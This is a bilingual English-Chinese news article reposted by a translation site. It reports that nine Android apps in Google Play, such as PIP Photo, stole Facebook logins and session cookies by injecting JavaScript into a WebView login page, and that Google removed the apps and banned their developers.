在谷歌应用商店中发现9个恶意应用窃取脸书登录凭证
2021-07-06 qq6630204qq 10911
正文翻译

Google LLC has removed nine Android apps from the Play store, including one with millions of users, after they were discovered to be stealing users’ Facebook Inc. login credentials.

在被发现窃取用户脸书数据之后,谷歌公司已经迅速下架9个恶意软件,其中包含一个拥有数以百万级别的应用
原创翻译:龙腾网 http://www.ltaaa.cn 转载请注明出处


Discovered and detailed July 1 by malware analysts at Dr. Web, the apps, described as “stealer Trojans,” were spread as harmless software and were installed nearly 6 million times. Unlike some previous cases where malicious Android apps have been discovered, the apps in this case all provided legitimate services such as photo editing and framing, exercise and training, horoscopes and junk file removal.

7月1日,Dr Web(一款俄罗斯杀毒软件)的恶意软件分析师发现并详细介绍了这些被描述为“窃取木马程序”的应用程序,它们作为无害软件传播开来,安装了接近600万次。
与之前发现的一些恶意Android应用程序不同,在这种情况下,这些应用程序都提供了合法的服务,如照片编辑和相框、锻炼和培训、星座和垃圾文件删除功能。

Apps included PIP Photo with up to 5 million installs; Processing Photo with up to 500,000 installs; Rubbish Cleaner, Horoscope Daily and Inwell Fitness with up to 100,000 installs; and App Lock Keep with up to 50,000 installs. Lockit Master, Horoscope Pi and App Lock Manager rounded out the list.

这些恶意应用程序包含了,高达500多万次安装下载的PIP Photo ;20多万次安装下载的Processing Photo;10多万次下载安装的Rubbish Cleaner,Horoscope Daily和Inkwell Fitness;以及5万多次下载安装的App Lock Keep,Lockit Master, Horoscope Pi 和App Lock Manager 紧随其后

Commonly between the apps, users were offered the ability to disable in-app ads by logging into their Facebook account. The analysts noted that “the advertisements inside some of the apps were indeed present and this maneuver was intended to further encourage Android device owners to perform the required actions.”

在这些应用中比较常见的恶意行为是 ,用户可以通过登录自己的脸书账户以此来禁用程序内的广告,相关分析人员指出,"一些应用内确实引入了一些广告,这种做法是为了进一步鼓励安卓用户的进一步操作

App users sexting the option were then presented with a standard Facebook login but with a difference: The genuine Facebook login page was shown in WebView with jaxcript also loaded to hijack the entered login credentials.

而当用户选择了以登录脸书而换取无广告的应用体验时,页面会加载一个标准的脸书登录页面,但是不同的是,该页面同时也加载了可以劫持用户脸书登录数据的恶意jaxcript脚本

When users entered their Facebook login details, the jaxcript would then send the credentials to the attacker’s command-and-control server, while the users would be none the wiser, having successfully logged into Facebook. After the victims logged into their account, the Trojan also stole cookies from the current authorization sessions.

当用户输入他们的脸书登录信息时,恶意jaxcript的脚本就会将凭证发送到攻击者的命令和控制服务器,而用户则毫不知情,因为他们已经成功登录了脸书。在受害者登录他们的账户后,该木马还从当前的授权会话中窃取cookie值。
原创翻译:龙腾网 http://www.ltaaa.cn 转载请注明出处


Although those behind the apps targeted Facebook accounts, they could have targeted accounts on other services. “The attackers could have easily changed the trojans’ settings and commanded them to load the web page of another legitimate service,” the analysts explained. “They could have even used a completely fake login form located on a phishing site. Thus, the trojans could have been used to steal logins and passwords from any service.”

尽管这些应用程序背后的人以窃取脸书账户为目标,但他们也可能以其他服务的账户为目标。"攻击者可以很容易地改变木马的设置,并命令它们加载另一个合法服务的网页,"分析家们解释说。"他们甚至可以使用位于钓鱼网站上的一个完全伪造虚假的登录表格。因此,这些木马可以被用来从任何服务中窃取登录和密码。

Google has not made a public statement on the apps yet. Ars Technica reported Friday that the apps have been removed from the store. A Google spokesperson told Ars Technica that the developers of the apps have also been banned.

截至目前谷歌还没有就这些恶意应用程序发表公开声明。Ars Technica周五报道,这些应用程序已经从商店中删除。一位谷歌发言人告诉Ars Technica,这些应用程序的开发者也被封禁。

评论翻译
很赞 0
收藏